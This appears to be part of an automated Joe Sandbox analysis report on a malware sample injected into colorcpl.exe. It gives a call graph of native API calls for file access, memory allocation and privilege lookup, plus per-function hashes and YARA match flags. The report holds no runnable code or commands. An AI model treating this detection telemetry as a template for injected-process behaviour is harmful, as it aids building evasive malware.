                                                                                                    execution_graph 98054 1e672ad0 LdrInitializeThunk 98055 68cf070 98056 68cf07b 98055->98056 98058 68cb930 98055->98058 98059 68cb956 98058->98059 98066 68b9d30 98059->98066 98061 68cb962 98062 68cb983 98061->98062 98072 68bc1b0 98061->98072 98062->98056 98064 68cb975 98104 68ca670 98064->98104 98068 68b9d3d 98066->98068 98107 68b9c80 98066->98107 98069 68b9d44 98068->98069 98114 68bf170 98068->98114 98069->98061 98074 68bc1d5 98072->98074 98073 68bc4a3 98073->98064 98074->98073 98352 68c4390 98074->98352 98076 68bc297 98076->98073 98355 68b8a60 98076->98355 98078 68bc2db 98078->98073 98363 68ca4c0 98078->98363 98082 68bc331 98083 68bc338 98082->98083 98374 68c9fd0 98082->98374 98084 68cbd80 RtlFreeHeap 98083->98084 98086 68bc345 98084->98086 98086->98064 98088 68bc382 98089 68cbd80 RtlFreeHeap 98088->98089 98090 68bc389 98089->98090 98090->98064 98091 68bc392 98092 68bf490 2 API calls 98091->98092 98093 68bc406 98092->98093 98093->98083 98094 68bc411 98093->98094 98095 68cbd80 RtlFreeHeap 98094->98095 98096 68bc435 98095->98096 98378 68ca020 98096->98378 98099 68c9fd0 LdrInitializeThunk 98100 68bc470 98099->98100 98100->98073 98382 68c9de0 98100->98382 98103 68ca670 ExitProcess 98103->98073 98105 68caf20 98104->98105 98106 68ca68f ExitProcess 98105->98106 98106->98062 98109 68b9c93 98107->98109 98108 68b9ca6 98108->98068 98109->98108 98122 68cb270 98109->98122 98111 68b9ce3 98111->98108 98133 68b9aa0 98111->98133 98113 68b9d03 98113->98068 98116 68bf189 98114->98116 98115 68b9d55 98115->98061 98116->98115 98344 68ca790 98116->98344 98118 68bf1c2 98119 68bf1ed 98118->98119 98347 68ca220 98118->98347 98121 68ca450 NtClose 98119->98121 98121->98115 98123 68cb289 98122->98123 98139 68c4a40 98123->98139 98125 68cb2aa 98125->98111 98126 68cb2a1 98126->98125 98168 68cb0b0 98126->98168 98128 68cb2be 98128->98125 98182 68c9ec0 98128->98182 98136 68b9aba 98133->98136 98323 68b7ea0 98133->98323 98135 68b9ac1 98135->98113 98136->98135 98336 68b8160 98136->98336 98140 68c4a54 98139->98140 98141 68c4b63 98139->98141 98140->98141 98189 68ca320 98140->98189 98141->98126 98143 68c4ba7 98144 68cbd80 RtlFreeHeap 98143->98144 98147 68c4bb3 98144->98147 98145 68c4d39 98148 68ca450 NtClose 98145->98148 98146 68c4d4f 98238 68c4780 NtReadFile NtClose 98146->98238 98147->98141 98147->98145 98147->98146 98152 68c4c42 98147->98152 98149 68c4d40 98148->98149 98149->98126 98151 68c4d62 98151->98126 98153 68c4ca9 98152->98153 98154 68c4c51 98152->98154 98153->98145 98160 68c4cbc 98153->98160 98155 68c4c6a 98154->98155 98156 68c4c56 98154->98156 98158 68c4c6f 98155->98158 98159 68c4c87 98155->98159 98234 68c4640 NtClose LdrInitializeThunk LdrInitializeThunk 98156->98234 98192 68c46e0 98158->98192 98159->98149 98202 68c4400 98159->98202 98235 68ca450 98160->98235 98161 68c4c60 98161->98126 98163 68c4c7d 98163->98126 98166 68c4c9f 98166->98126 98167 68c4d28 98167->98126 98169 68cb0c1 98168->98169 98170 68cb0d3 98169->98170 98257 68cbd00 98169->98257 98170->98128 98172 68cb0f4 98260 68c4060 98172->98260 98174 68cb140 98174->98128 98175 68cb117 98175->98174 98176 68c4060 2 API calls 98175->98176 98177 68cb139 98176->98177 98177->98174 98285 68c5380 98177->98285 98179 68cb1ca 98295 68c9e80 98179->98295 98183 68c9edc 98182->98183 98317 1e672c0a 98183->98317 98184 68c9ef7 98186 68cbd80 98184->98186 98320 68ca630 98186->98320 98188 68cb319 98188->98111 98190 68ca33c 98189->98190 98191 68ca349 NtCreateFile 98190->98191 98191->98143 98193 68c46fc 98192->98193 98194 68c4738 98193->98194 98195 68c4724 98193->98195 98197 68ca450 NtClose 98194->98197 98196 68ca450 NtClose 98195->98196 98198 68c472d 98196->98198 98199 68c4741 98197->98199 98198->98163 98239 68cbf90 RtlAllocateHeap 98199->98239 98201 68c474c 98201->98163 98203 68c447e 98202->98203 98204 68c444b 98202->98204 98206 68c449a 98203->98206 98212 68c45c9 98203->98212 98205 68ca450 NtClose 98204->98205 98207 68c446f 98205->98207 98208 68c44bc 98206->98208 98209 68c44d1 98206->98209 98207->98166 98213 68ca450 NtClose 98208->98213 98210 68c44ec 98209->98210 98211 68c44d6 98209->98211 98222 68c44f1 98210->98222 98240 68cbf50 98210->98240 98215 68ca450 NtClose 98211->98215 98216 68ca450 NtClose 98212->98216 98214 68c44c5 98213->98214 98214->98166 98218 68c44df 98215->98218 98217 68c4629 98216->98217 98217->98166 98218->98166 98221 68c4557 98223 68c458a 98221->98223 98224 68c4575 98221->98224 98227 68c4503 98222->98227 98243 68ca3d0 98222->98243 98226 68ca450 NtClose 98223->98226 98225 68ca450 NtClose 98224->98225 98225->98227 98228 68c4593 98226->98228 98227->98166 98229 68c45bf 98228->98229 98247 68cbb50 98228->98247 98229->98166 98231 68c45aa 98232 68cbd80 RtlFreeHeap 98231->98232 98233 68c45b3 98232->98233 98233->98166 98234->98161 98236 68caf20 98235->98236 98237 68ca46c NtClose 98236->98237 98237->98167 98238->98151 98239->98201 98252 68ca5f0 98240->98252 98242 68cbf68 98242->98222 98244 68ca3ec NtReadFile 98243->98244 98245 68caf20 98243->98245 98244->98221 98246 68ca43c 98244->98246 98245->98244 98246->98221 98248 68cbb5d 98247->98248 98249 68cbb74 98247->98249 98248->98249 98250 68cbf50 RtlAllocateHeap 98248->98250 98249->98231 98251 68cbb8b 98250->98251 98251->98231 98255 68caf20 98252->98255 98254 68ca60c RtlAllocateHeap 98254->98242 98256 68caf30 98255->98256 98256->98254 98299 68ca500 98257->98299 98259 68cbd2d 98259->98172 98261 68c4071 98260->98261 98262 68c4079 98260->98262 98261->98175 98263 68c434c 98262->98263 98302 68ccef0 98262->98302 98263->98175 98265 68c40cd 98266 68ccef0 RtlAllocateHeap 98265->98266 98269 68c40d8 98266->98269 98267 68c4126 98270 68ccef0 RtlAllocateHeap 98267->98270 98269->98267 98307 68ccf90 98269->98307 98271 68c413a 98270->98271 98272 68ccef0 RtlAllocateHeap 98271->98272 98274 68c41ad 98272->98274 98273 68ccef0 RtlAllocateHeap 98282 68c41f5 98273->98282 98274->98273 98277 68ccf50 RtlFreeHeap 98278 68c432e 98277->98278 98279 68c4338 98278->98279 98280 68ccf50 RtlFreeHeap 98278->98280 98281 68ccf50 RtlFreeHeap 98279->98281 98280->98279 98283 68c4342 98281->98283 98313 68ccf50 98282->98313 98284 68ccf50 RtlFreeHeap 98283->98284 98284->98263 98286 68c5391 98285->98286 98287 68c4a40 7 API calls 98286->98287 98289 68c53a7 98287->98289 98288 68c53fa 98288->98179 98289->98288 98290 68c53f5 98289->98290 98291 68c53e2 98289->98291 98293 68cbd80 RtlFreeHeap 98290->98293 98292 68cbd80 RtlFreeHeap 98291->98292 98294 68c53e7 98292->98294 98293->98288 98294->98179 98296 68c9e9c 98295->98296 98316 1e672df0 LdrInitializeThunk 98296->98316 98297 68c9eb3 98297->98128 98300 68ca51c NtAllocateVirtualMemory 98299->98300 98301 68caf20 98299->98301 98300->98259 98301->98300 98303 68ccf06 98302->98303 98304 68ccf00 98302->98304 98305 68cbf50 RtlAllocateHeap 98303->98305 98304->98265 98306 68ccf2c 98305->98306 98306->98265 98308 68ccfed 98307->98308 98309 68ccfb5 98307->98309 98308->98269 98310 68cbf50 RtlAllocateHeap 98309->98310 98311 68ccfca 98310->98311 98312 68cbd80 RtlFreeHeap 98311->98312 98312->98308 98314 68c4324 98313->98314 98315 68cbd80 RtlFreeHeap 98313->98315 98314->98277 98315->98314 98316->98297 98318 1e672c11 98317->98318 98319 1e672c1f LdrInitializeThunk 98317->98319 98318->98184 98319->98184 98321 68ca64c RtlFreeHeap 98320->98321 98322 68caf20 98320->98322 98321->98188 98322->98321 98324 68b7eab 98323->98324 98325 68b7eb0 98323->98325 98324->98136 98326 68cbd00 NtAllocateVirtualMemory 98325->98326 98329 68b7ed5 98326->98329 98327 68b7f38 98327->98136 98328 68c9e80 LdrInitializeThunk 98328->98329 98329->98327 98329->98328 98330 68b7f3e 98329->98330 98335 68cbd00 NtAllocateVirtualMemory 98329->98335 98339 68ca580 98329->98339 98332 68b7f64 98330->98332 98333 68ca580 LdrInitializeThunk 98330->98333 98332->98136 98334 68b7f55 98333->98334 98334->98136 98335->98329 98337 68ca580 LdrInitializeThunk 98336->98337 98338 68b817e 98337->98338 98338->98113 98340 68ca59c 98339->98340 98343 1e672c70 LdrInitializeThunk 98340->98343 98341 68ca5b3 98341->98329 98343->98341 98345 68caf20 98344->98345 98346 68ca7af LookupPrivilegeValueW 98345->98346 98346->98118 98348 68ca23c 98347->98348 98351 1e672ea0 LdrInitializeThunk 98348->98351 98349 68ca25b 98349->98119 98351->98349 98353 68bf490 2 API calls 98352->98353 98354 68c43b6 98353->98354 98354->98076 98356 68b8a6f 98355->98356 98386 68b87a0 98356->98386 98359 68b8a9d 98359->98078 98360 68b87a0 18 API calls 98361 68b8a8a 98360->98361 98361->98359 98399 68bf700 9 API calls 98361->98399 98364 68ca4dc 98363->98364 98490 1e672e80 LdrInitializeThunk 98364->98490 98365 68bc312 98367 68bf490 98365->98367 98368 68bf4ad 98367->98368 98491 68c9f80 98368->98491 98371 68bf4f5 98371->98082 98372 68c9fd0 LdrInitializeThunk 98373 68bf51e 98372->98373 98373->98082 98375 68c9fec 98374->98375 98496 1e672d10 LdrInitializeThunk 98375->98496 98376 68bc375 98376->98088 98376->98091 98379 68ca02c 98378->98379 98497 1e672d30 LdrInitializeThunk 98379->98497 98380 68bc449 98380->98099 98383 68c9dfc 98382->98383 98498 1e672fb0 LdrInitializeThunk 98383->98498 98384 68bc49c 98384->98103 98387 68b7ea0 3 API calls 98386->98387 98397 68b87ba 98387->98397 98388 68b8a49 98388->98359 98388->98360 98389 68b8a3f 98390 68b8160 LdrInitializeThunk 98389->98390 98390->98388 98391 68c9ec0 LdrInitializeThunk 98391->98397 98393 68ca450 NtClose 98393->98397 98395 68bc4b0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98395->98397 98396 68c9de0 LdrInitializeThunk 98396->98397 98397->98388 98397->98389 98397->98391 98397->98393 98397->98395 98397->98396 98400 68b85d0 98397->98400 98412 68bf5e0 NtClose 98397->98412 98413 68b83a0 98397->98413 98399->98359 98401 68b85e6 98400->98401 98425 68c9840 98401->98425 98403 68b8771 98403->98397 98404 68b85ff 98404->98403 98446 68b81a0 98404->98446 98406 68b86e5 98406->98403 98407 68b83a0 10 API calls 98406->98407 98408 68b8713 98407->98408 98408->98403 98409 68c9ec0 LdrInitializeThunk 98408->98409 98410 68b8748 98409->98410 98410->98403 98411 68ca4c0 LdrInitializeThunk 98410->98411 98411->98403 98412->98397 98414 68b83c9 98413->98414 98477 68b8310 98414->98477 98417 68ca4c0 LdrInitializeThunk 98418 68b83dc 98417->98418 98418->98417 98419 68b8467 98418->98419 98421 68b8462 98418->98421 98481 68bf660 98418->98481 98419->98397 98420 68ca450 NtClose 98422 68b849a 98420->98422 98421->98420 98422->98419 98423 68c4a40 7 API calls 98422->98423 98424 68b85b8 98423->98424 98424->98397 98426 68cbf50 RtlAllocateHeap 98425->98426 98427 68c9857 98426->98427 98453 68b9310 98427->98453 98429 68c9872 98430 68c9899 98429->98430 98431 68c98b0 98429->98431 98432 68cbd80 RtlFreeHeap 98430->98432 98433 68cbd00 NtAllocateVirtualMemory 98431->98433 98434 68c98a6 98432->98434 98435 68c98ea 98433->98435 98434->98404 98436 68cbd00 NtAllocateVirtualMemory 98435->98436 98437 68c9903 98436->98437 98443 68c9ba4 98437->98443 98457 68cbd40 98437->98457 98440 68c9b90 98441 68cbd80 RtlFreeHeap 98440->98441 98442 68c9b9a 98441->98442 98442->98404 98444 68cbd80 RtlFreeHeap 98443->98444 98445 68c9bf9 98444->98445 98445->98404 98447 68b829f 98446->98447 98448 68b81b5 98446->98448 98447->98406 98448->98447 98449 68c4a40 7 API calls 98448->98449 98450 68b8222 98449->98450 98451 68cbd80 RtlFreeHeap 98450->98451 98452 68b8249 98450->98452 98451->98452 98452->98406 98454 68b9335 98453->98454 98456 68b938d 98454->98456 98460 68bcf10 98454->98460 98456->98429 98472 68ca540 98457->98472 98462 68bcf3c 98460->98462 98461 68bcf5c 98461->98456 98462->98461 98467 68ca1e0 98462->98467 98464 68bcf7f 98464->98461 98465 68ca450 NtClose 98464->98465 98466 68bcfba 98465->98466 98466->98456 98468 68ca1fc 98467->98468 98471 1e672ca0 LdrInitializeThunk 98468->98471 98469 68ca217 98469->98464 98471->98469 98473 68ca55c 98472->98473 98476 1e672f90 LdrInitializeThunk 98473->98476 98474 68c9b89 98474->98440 98474->98443 98476->98474 98478 68b8328 98477->98478 98479 68b835c PostThreadMessageW 98478->98479 98480 68b8370 98478->98480 98479->98480 98480->98418 98482 68bf673 98481->98482 98485 68c9e50 98482->98485 98486 68c9e6c 98485->98486 98489 1e672dd0 LdrInitializeThunk 98486->98489 98487 68bf69e 98487->98418 98489->98487 98490->98365 98492 68c9f9c 98491->98492 98495 1e672f30 LdrInitializeThunk 98492->98495 98493 68bf4ee 98493->98371 98493->98372 98495->98493 98496->98376 98497->98380 98498->98384

                                                                                                    Executed Functions

                                                                                                    Function 068CA44A Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 210 68ca44a-68ca44e 211 68ca47f-68ca496 210->211 212 68ca450-68ca479 call 68caf20 NtClose 210->212 214 68ca49c-68ca4bd 211->214 215 68ca497 call 68caf20 211->215 215->214
                                                                                                    APIs
                                                                                                    • NtClose.NTDLL(068C4D40,?,?,068C4D40,068B9CE3,FFFFFFFF), ref: 068CA475
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 3535843008-0
                                                                                                    • Opcode ID: 898637ef7c7260304275813e627a98256f723e5e551bdf8928c2c01671a4a615
                                                                                                    • Instruction ID: 62c14862fd30614fcbc41cb59fee5c7e2af92eb542a52f1f794d7b01ae7fa2a3
                                                                                                    • Opcode Fuzzy Hash: 898637ef7c7260304275813e627a98256f723e5e551bdf8928c2c01671a4a615
                                                                                                    • Instruction Fuzzy Hash: 4C0171B6210208ABDB14DF98DC84EEB77ADEF88754F104559FA5C97201C534E914C7A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 068CA3CB Relevance: 1.5, APIs: 1, Instructions: 46filenativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 218 68ca3cb-68ca3cc 219 68ca43c-68ca449 218->219 220 68ca3ce-68ca419 call 68caf20 NtReadFile 218->220 220->219
                                                                                                    APIs
                                                                                                    • NtReadFile.NTDLL(068C4D62,5EB65239,FFFFFFFF,068C4A21,?,?,068C4D62,?,068C4A21,FFFFFFFF,5EB65239,068C4D62,?,00000000), ref: 068CA415
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: 60b9bf0d8b25dd819aabfe3d7b5e2df0584732c14aaf24a02217d2e8f2f51bc0
                                                                                                    • Instruction ID: 660776de92d15987375739f4e581f77e5095d4050c3da2b4199ec0ad50ac465a
                                                                                                    • Opcode Fuzzy Hash: 60b9bf0d8b25dd819aabfe3d7b5e2df0584732c14aaf24a02217d2e8f2f51bc0
                                                                                                    • Instruction Fuzzy Hash: 5801E4B6200108AFCB18DF98DC84DEB77A9EF8C364F168249FA5DD7251D630E9118BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 068CA320 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 224 68ca320-68ca371 call 68caf20 NtCreateFile
                                                                                                    APIs
                                                                                                    • NtCreateFile.NTDLL(00000060,068B9CE3,?,068C4BA7,068B9CE3,FFFFFFFF,?,?,FFFFFFFF,068B9CE3,068C4BA7,?,068B9CE3,00000060,00000000,00000000), ref: 068CA36D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                    • Instruction ID: a5a498371414b9fb76d347114fd0aa86b32175f79629b54fda3147a588b6ee07
                                                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                    • Instruction Fuzzy Hash: AFF0BDB2210208AFCB48CF88DC84EEB77ADAF8C754F158248BA1D97240C630E8118BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 068CA322 Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 228 68ca322-68ca336 229 68ca33c-68ca371 NtCreateFile 228->229 230 68ca337 call 68caf20 228->230 230->229
                                                                                                    APIs
                                                                                                    • NtCreateFile.NTDLL(00000060,068B9CE3,?,068C4BA7,068B9CE3,FFFFFFFF,?,?,FFFFFFFF,068B9CE3,068C4BA7,?,068B9CE3,00000060,00000000,00000000), ref: 068CA36D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: e14685e1336d3e8bedad5cc8f4a0513404ab599c5713b13c8e7169f06608a5db
                                                                                                    • Instruction ID: 277013b9516007b8060371f4f2946f73513a5f3fbd1a4473af8d8d2eded39b9a
                                                                                                    • Opcode Fuzzy Hash: e14685e1336d3e8bedad5cc8f4a0513404ab599c5713b13c8e7169f06608a5db
                                                                                                    • Instruction Fuzzy Hash: BFF07AB2211108AFCB48CF98DC94EEB77A9AF8C754F158248FA1DE7240D630E851CBA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 068CA3D0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 232 68ca3d0-68ca3e6 233 68ca3ec-68ca419 NtReadFile 232->233 234 68ca3e7 call 68caf20 232->234 235 68ca43c-68ca449 233->235 234->233
                                                                                                    APIs
                                                                                                    • NtReadFile.NTDLL(068C4D62,5EB65239,FFFFFFFF,068C4A21,?,?,068C4D62,?,068C4A21,FFFFFFFF,5EB65239,068C4D62,?,00000000), ref: 068CA415
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                    • Instruction ID: bf2657d175ab1ee0ec50b34b97c45c070d900114d1b50623f739481fc5b23299
                                                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                    • Instruction Fuzzy Hash: 24F0A4B2210208AFCB18DF89DC80EEB77ADAF8C754F158248BA1D97241D630E8118BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 068CA373 Relevance: 1.5, APIs: 1, Instructions: 34filenativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 237 68ca373-68ca374 238 68ca349-68ca371 NtCreateFile 237->238 239 68ca376-68ca37d 237->239 240 68ca37f 239->240 241 68ca315-68ca319 239->241
                                                                                                    APIs
                                                                                                    • NtCreateFile.NTDLL(00000060,068B9CE3,?,068C4BA7,068B9CE3,FFFFFFFF,?,?,FFFFFFFF,068B9CE3,068C4BA7,?,068B9CE3,00000060,00000000,00000000), ref: 068CA36D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: c9fc46358d2c376686e9dfda9f2929a5e029bee3152b92d67e3f90868ff24a53
                                                                                                    • Instruction ID: cf8f5aa4f610f694ef1bc52ea21883f220c613854e2c20ca4d22613ff4e02685
                                                                                                    • Opcode Fuzzy Hash: c9fc46358d2c376686e9dfda9f2929a5e029bee3152b92d67e3f90868ff24a53
                                                                                                    • Instruction Fuzzy Hash: 34F0ACB2208119AF8B48CED8EC90CEF77EDAB8C724714860DF60CC3240D631E8518BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 068CA4FA Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 243 68ca4fa-68ca53d call 68caf20 NtAllocateVirtualMemory
                                                                                                    APIs
                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,068CB0F4,?,00000000,?,00003000,00000040,00000000,00000000,068B9CE3), ref: 068CA539
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2167126740-0
                                                                                                    • Opcode ID: c3c0fdddf0a4fc09e274b8f9c8a92c48767341bfd8c440458c0ed10aac57b8f0
                                                                                                    • Instruction ID: 37f5792efb35ba63ec90836d83a88efb1021cd6f662545d6a399aad1b70cfdb5
                                                                                                    • Opcode Fuzzy Hash: c3c0fdddf0a4fc09e274b8f9c8a92c48767341bfd8c440458c0ed10aac57b8f0
                                                                                                    • Instruction Fuzzy Hash: 22F0F8B6210118AFCB14DF99DC81EEB77A9AF88354F158648BA1997241C631E811CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 068CA500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 246 68ca500-68ca516 247 68ca51c-68ca53d NtAllocateVirtualMemory 246->247 248 68ca517 call 68caf20 246->248 248->247
                                                                                                    APIs
                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,068CB0F4,?,00000000,?,00003000,00000040,00000000,00000000,068B9CE3), ref: 068CA539
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2167126740-0
                                                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                    • Instruction ID: 98d3bb8579724188f6404a7ec8cdbf3bf192a6b4d5221850172bdfafc4371471
                                                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                    • Instruction Fuzzy Hash: 36F015B2210208AFCB18DF89DC80EAB77ADAF88754F118248BE1897241C630F810CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 068CA450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • NtClose.NTDLL(068C4D40,?,?,068C4D40,068B9CE3,FFFFFFFF), ref: 068CA475
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 3535843008-0
                                                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                    • Instruction ID: a75958a0433d2eac386b821375f1a0ea314142c0e6c3520249a18616b4457d2f
                                                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                    • Instruction Fuzzy Hash: FBD01776200218ABD714EB98DC85EAB7BACEF48760F154599BA189B242C570FA0087E0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E672EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 754b803eda38c00960d7d1c03e790935bb43a32c497508ad55910375f6bf82fb
                                                                                                    • Instruction ID: ef700ba2d77f73054f99c6f1687634d59260131fff3f4ffb96686b5a95367860
                                                                                                    • Opcode Fuzzy Hash: 754b803eda38c00960d7d1c03e790935bb43a32c497508ad55910375f6bf82fb
                                                                                                    • Instruction Fuzzy Hash: CC90027120150402D14075595444B4A410647D0701FD9C111A5064518F86598ED56665
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E672E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: e0f5f1117366c143acd60e1b1e4f10c548ede9b153666a97905e5ed4408d6018
                                                                                                    • Instruction ID: 84a00bb0e1e12f66c975b296c349e4f513ee55a96abf5b0f1a0b2dca11045105
                                                                                                    • Opcode Fuzzy Hash: e0f5f1117366c143acd60e1b1e4f10c548ede9b153666a97905e5ed4408d6018
